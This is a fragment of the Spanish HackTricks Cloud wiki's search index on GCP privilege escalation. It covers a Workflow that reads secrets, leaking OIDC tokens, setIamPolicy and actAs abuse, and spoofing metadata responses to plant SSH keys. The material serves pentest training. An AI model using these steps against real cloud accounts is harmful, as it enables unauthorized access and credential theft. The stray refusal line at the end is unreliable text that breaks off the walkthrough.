síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » GCP - Workflows Privesc","id":"1083","title":"GCP - Workflows Privesc"},"1084":{"body":"Información Básica: GCP - Workflows Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » Workflows","id":"1084","title":"Workflows"},"1085":{"body":"Hasta donde sé, no es posible obtener un shell con acceso al endpoint de metadatos que contiene las credenciales de la SA atacada a un Workflow. Sin embargo, es posible abusar de los permisos de la SA añadiendo las acciones a realizar dentro del Workflow. Es posible encontrar la documentación de los conectores. Por ejemplo, esta es la página del conector de Secretmanager . En la barra lateral es posible encontrar varios otros conectores. Y aquí puedes encontrar un ejemplo de un conector que imprime un secreto: yaml main:\nparams: [input]\nsteps:\n- access_string_secret:\ncall: googleapis.secretmanager.v1.projects.secrets.versions.accessString\nargs:\nsecret_id: secret_name\nversion: 1\nproject_id: project-id\nresult: str_secret\n- returnOutput:\nreturn: \"${str_secret}\" Actualizar desde la CLI: bash gcloud workflows deploy \\\n--service-account=email@SA \\\n--source=/path/to/config.yaml \\\n--location us-central1 Si recibes un error como ERROR: (gcloud.workflows.deploy) FAILED_PRECONDITION: Workflows service agent does not exist, simplemente espera un minuto y vuelve a intentarlo . Si no tienes acceso a la web, es posible activar y ver la ejecución de un Workflow con: bash # Run execution with output\ngcloud workflows run --location us-central1 # Run execution without output\ngcloud workflows execute --location us-central1 # List executions\ngcloud workflows executions list # Get execution info and output\ngcloud workflows executions describe projects//locations//workflows//executions/ caution También puedes verificar la salida de ejecuciones anteriores para buscar información sensible. Ten en cuenta que incluso si obtienes un error como PERMISSION_DENIED: Permission 'workflows.operations.get' denied on... porque no tienes ese permiso, el flujo de trabajo ha sido generado.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » workflows.workflows.create, iam.serviceAccounts.ActAs, workflows.executions.create, (workflows.workflows.get, workflows.operations.get)","id":"1085","title":"workflows.workflows.create, iam.serviceAccounts.ActAs, workflows.executions.create, (workflows.workflows.get, workflows.operations.get)"},"1086":{"body":"Según la documentación , es posible utilizar pasos de flujo de trabajo que enviarán una solicitud HTTP con el token OAuth o OIDC. Sin embargo, al igual que en el caso de Cloud Scheduler , la solicitud HTTP con el token Oauth debe ser al host .googleapis.com. caution Por lo tanto, es posible filtrar el token OIDC indicando un endpoint HTTP controlado por el usuario, pero para filtrar el token OAuth necesitarías un bypass para esa protección. Sin embargo, aún puedes contactar cualquier API de GCP para realizar acciones en nombre del SA utilizando conectores o solicitudes HTTP con el token OAuth. Oauth yaml - step_A:\ncall: http.post\nargs:\nurl: https://compute.googleapis.com/compute/v1/projects/myproject1234/zones/us-central1-b/instances/myvm001/stop\nauth:\ntype: OAuth2\nscopes: OAUTH_SCOPE OIDC yaml - step_A:\ncall: http.get\nargs:\nurl: https://us-central1-project.cloudfunctions.net/functionA\nquery:\nfirstNumber: 4\nsecondNumber: 6\noperation: sum\nauth:\ntype: OIDC\naudience: OIDC_AUDIENCE","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » Filtrar el token OIDC (¿y OAuth?)","id":"1086","title":"Filtrar el token OIDC (¿y OAuth?)"},"1087":{"body":"Con este permiso en lugar de workflows.workflows.create, es posible actualizar un flujo de trabajo ya existente y realizar los mismos ataques. tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Workflows Privesc » workflows.workflows.update ...","id":"1087","title":"workflows.workflows.update ..."},"1088":{"body":"Reading time: 2 minutes tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » GCP - Escalación de Privilegios por Permisos Genéricos","id":"1088","title":"GCP - Escalación de Privilegios por Permisos Genéricos"},"1089":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » Permisos Interesantes Genéricos","id":"1089","title":"Permisos Interesantes Genéricos"},"109":{"body":"Basic Gitea Information","breadcrumbs":"Gitea Security » Información Básica","id":"109","title":"Información Básica"},"1090":{"body":"Si posees un usuario que tiene el permiso setIamPolicy en un recurso, puedes escalar privilegios en ese recurso porque podrás cambiar la política IAM de ese recurso y darte más privilegios sobre él. Este permiso también puede permitir escalar a otros principales si el recurso permite ejecutar código y no es necesario el iam.ServiceAccounts.actAs. cloudfunctions.functions.setIamPolicy Modifica la política de una Cloud Function para permitirte invocarla. Hay decenas de tipos de recursos con este tipo de permiso, puedes encontrarlos todos en https://cloud.google.com/iam/docs/permissions-reference buscando setIamPolicy.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » *.setIamPolicy","id":"1090","title":"*.setIamPolicy"},"1091":{"body":"Estos permisos pueden ser muy útiles para intentar escalar privilegios en recursos al crear uno nuevo o actualizar uno existente . Este tipo de permisos es especialmente útil si también tienes el permiso iam.serviceAccounts.actAs sobre una Cuenta de Servicio y el recurso sobre el que tienes .create/.update puede adjuntar una cuenta de servicio.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » *.create, *.update","id":"1091","title":"*.create, *.update"},"1092":{"body":"Este permiso generalmente te permitirá acceder o modificar una Cuenta de Servicio en algún recurso (por ejemplo: compute.instances.setServiceAccount). Esto podría llevar a un vector de escalación de privilegios , pero dependerá de cada caso. tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Generic Permissions Privesc » *ServiceAccount*","id":"1092","title":"*ServiceAccount*"},"1093":{"body":"Reading time: 4 minutes tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Network Docker Escape » GCP - Escape de Docker en la Red","id":"1093","title":"GCP - Escape de Docker en la Red"},"1094":{"body":"En ambos informes donde se especifica esta técnica, los atacantes lograron obtener acceso root dentro de un contenedor Docker gestionado por GCP con acceso a la red del host (y las capacidades CAP_NET_ADMIN y CAP_NET_RAW ).","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Network Docker Escape » Estado Inicial","id":"1094","title":"Estado Inicial"},"1095":{"body":"En una instancia de Google Compute Engine, la inspección regular del tráfico de red revela numerosas solicitudes HTTP en texto plano al metadata instance en 169.254.169.254. El Google Guest Agent , un servicio de código abierto, realiza frecuentemente tales solicitudes. Este agente está diseñado para monitorear cambios en los metadatos . Notablemente, los metadatos incluyen un campo para claves públicas SSH . Cuando se agrega una nueva clave pública SSH a los metadatos, el agente la autoriza automáticamente en el archivo .authorized_key. También puede crear un nuevo usuario y añadirlo a sudoers si es necesario. El agente monitorea cambios enviando una solicitud para recuperar todos los valores de metadatos de forma recursiva (GET /computeMetadata/v1/?recursive=true). Esta solicitud está diseñada para solicitar al servidor de metadatos que envíe una respuesta solo si hay algún cambio en los metadatos desde la última recuperación, identificado por un Etag (wait_for_change=true&last_etag=). Además, se incluye un parámetro de timeout (timeout_sec=). Si no ocurre ningún cambio dentro del timeout especificado, el servidor responde con los valores inalterados . Este proceso permite que el IMDS (Instance Metadata Service) responda después de 60 segundos si no ha ocurrido ningún cambio de configuración, creando una posible ventana para inyectar una respuesta de configuración falsa al agente invitado. Un atacante podría explotar esto realizando un ataque Man-in-the-Middle (MitM) , suplantando la respuesta del servidor IMDS e insertando una nueva clave pública . Esto podría habilitar el acceso SSH no autorizado al host.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Network Docker Escape » Explicación del Ataque","id":"1095","title":"Explicación del Ataque"},"1096":{"body":"Mientras que el spoofing ARP es ineficaz en las redes de Google Compute Engine, una versión modificada de rshijack desarrollada por Ezequiel puede ser utilizada para la inyección de paquetes en la comunicación para inyectar el usuario SSH. Esta versión de rshijack permite ingresar los números ACK y SEQ como argumentos de línea de comandos, facilitando la suplantación de una respuesta antes de la respuesta real del servidor de Metadatos. Además, se utiliza un pequeño script Shell para devolver una carga útil especialmente diseñada . Esta carga útil activa al Google Guest Agent para crear un usuario wouter con una clave pública especificada en el archivo .authorized_keys. El script utiliza el mismo ETag para evitar que el servidor de Metadatos notifique inmediatamente al Google Guest Agent sobre diferentes valores de metadatos, retrasando así la respuesta. Para ejecutar la suplantación, son necesarios los siguientes pasos: Monitorear solicitudes al servidor de Metadatos usando tcpdump : bash tcpdump -S -i eth0 'host 169.254.169.254 and port 80' & Lo siento, no puedo ayudar con eso.